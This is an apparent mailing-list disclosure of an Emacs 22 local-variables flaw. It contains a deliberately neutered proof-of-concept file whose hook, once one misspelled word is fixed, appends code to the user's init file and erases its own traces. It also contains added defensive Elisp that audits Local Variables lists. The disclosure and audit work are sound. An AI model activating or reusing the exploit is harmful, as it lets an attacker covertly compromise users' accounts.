Just as a follow-up, I can confirm that this flaw permits the execution of arbitrary Emacs Lisp code. Attached is a file that is almost such an evil file, but with the local variables list neutered similarly to the above. Read the file to see what it does. Once you can execute arbitrary Emacs Lisp code, of course, you can modify arbitrary files that can be written by the Emacs process, and once you can do that, you pretty much have full control over the user's account. Whee.
(Not Cc'ing to the Emacs lists at gnu.org to avoid flooding them with mail from non-subscribed persons; those of you more closely associated can forward if you feel like it.)

---> Drake Wilson

This is a harmless text file. Or at least it looks like one. In fact, it is. But it's almost not. If you were to change the word "variaboles" below to "variables", then load it into a vulnerable Emacs 22 with `enable-local-variables' set to :safe, it would rewrite the local variables list in the buffer itself to _look_ like a harmless text file, while in fact managing to add some evil code to the end of your user-init-file. Woopsy.

| Local variaboles:
| hack-local-variables-hook: ((lambda () (save-excursion (with-temp-buffer (insert "\n(run-with-timer 1 nil (lambda () (beep) (message \"Your Emacs init file is compromised!\")))") (append-to-file (point-min) (point-max) user-init-file)) (message nil) (with-current-buffer (get-buffer "*Messages*") (when (search-backward (concat "Added to " user-init-file) nil t) (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))))) (goto-char (point-max)) (search-backward "| hack-local-variables-hook") (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))) (insert "| mode: text\n") (set-buffer-modified-p nil) (text-mode))))
| End:
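The attached file works because a variable named hack-local-variables-hook is taken from the file's own Local Variables list and then run. As an added example, not part of Drake Wilson's message and not code from Emacs itself, the Emacs Lisp below reads a file's Local Variables list and reports, without applying anything to any buffer, how the predicates Emacs already ships (`risky-local-variable-p', which flags names ending in -hook, -function(s), -form(s), -program and similar, and `safe-local-variable-p', which consults the `safe-local-variable' property) classify each entry. The function names demo-local-variable-verdict and demo-audit-local-variables are made up for this illustration, and the parsing assumes the usual layout with a common line prefix, as in the attached file.

```elisp
;; Added example: audit a file's Local Variables list without applying it.
;; Not from the original message or from Emacs; the demo-* names are
;; invented for this illustration.

(defun demo-local-variable-verdict (var val)
  "Classify VAR with value VAL as `special', `risky', `safe' or `unknown'.
`mode' and `eval' get special handling in Emacs and are reported as such;
anything `risky-local-variable-p' flags, such as *-hook, is `risky'."
  (cond ((memq var '(mode eval)) 'special)
        ((risky-local-variable-p var) 'risky)
        ((safe-local-variable-p var val) 'safe)
        (t 'unknown)))

(defun demo-audit-local-variables (file)
  "Return a list of (VAR VALUE VERDICT) for each entry in FILE's
Local Variables list, or nil if the file has none.  Nothing is set
or evaluated; values are only read with `read-from-string'."
  (with-temp-buffer
    (insert-file-contents file)
    (goto-char (point-max))
    ;; Like Emacs, only look for the list in the last 3000 characters.
    (let ((case-fold-search t))
      (when (search-backward "Local Variables:"
                             (max (point-min) (- (point-max) 3000)) t)
        ;; Whatever precedes the header on its line is the line prefix
        ;; ("| " in the attached file) that every following line must carry.
        (let ((prefix (buffer-substring (line-beginning-position) (point)))
              (result nil)
              (done nil))
          (forward-line 1)
          (while (and (not done) (not (eobp)))
            (if (not (looking-at (concat (regexp-quote prefix) "\\(.*\\)$")))
                (setq done t)           ; prefix missing: list is over
              (let ((line (match-string 1)))
                (if (string-match "\\`[ \t]*End:" line)
                    (setq done t)       ; reached the End: marker
                  ;; "name: value" with the value as one Lisp expression.
                  (when (string-match
                         "\\`[ \t]*\\([^ \t:]+\\):[ \t]*\\(.*\\)\\'" line)
                    (let ((var (intern (match-string 1 line)))
                          (val (car (read-from-string (match-string 2 line)))))
                      (push (list var val (demo-local-variable-verdict var val))
                            result)))
                  (forward-line 1)))))
          (nreverse result))))))

;; Usage, from *scratch* or --batch -l, on a copy of a suspect file:
;; (demo-audit-local-variables "/tmp/suspect.txt")
```

On the attached file as distributed this returns nil, because the header is deliberately misspelled and so no list is found; on a copy with "variaboles" corrected it reports hack-local-variables-hook as risky, which is the verdict a working :safe setting is expected to refuse rather than run.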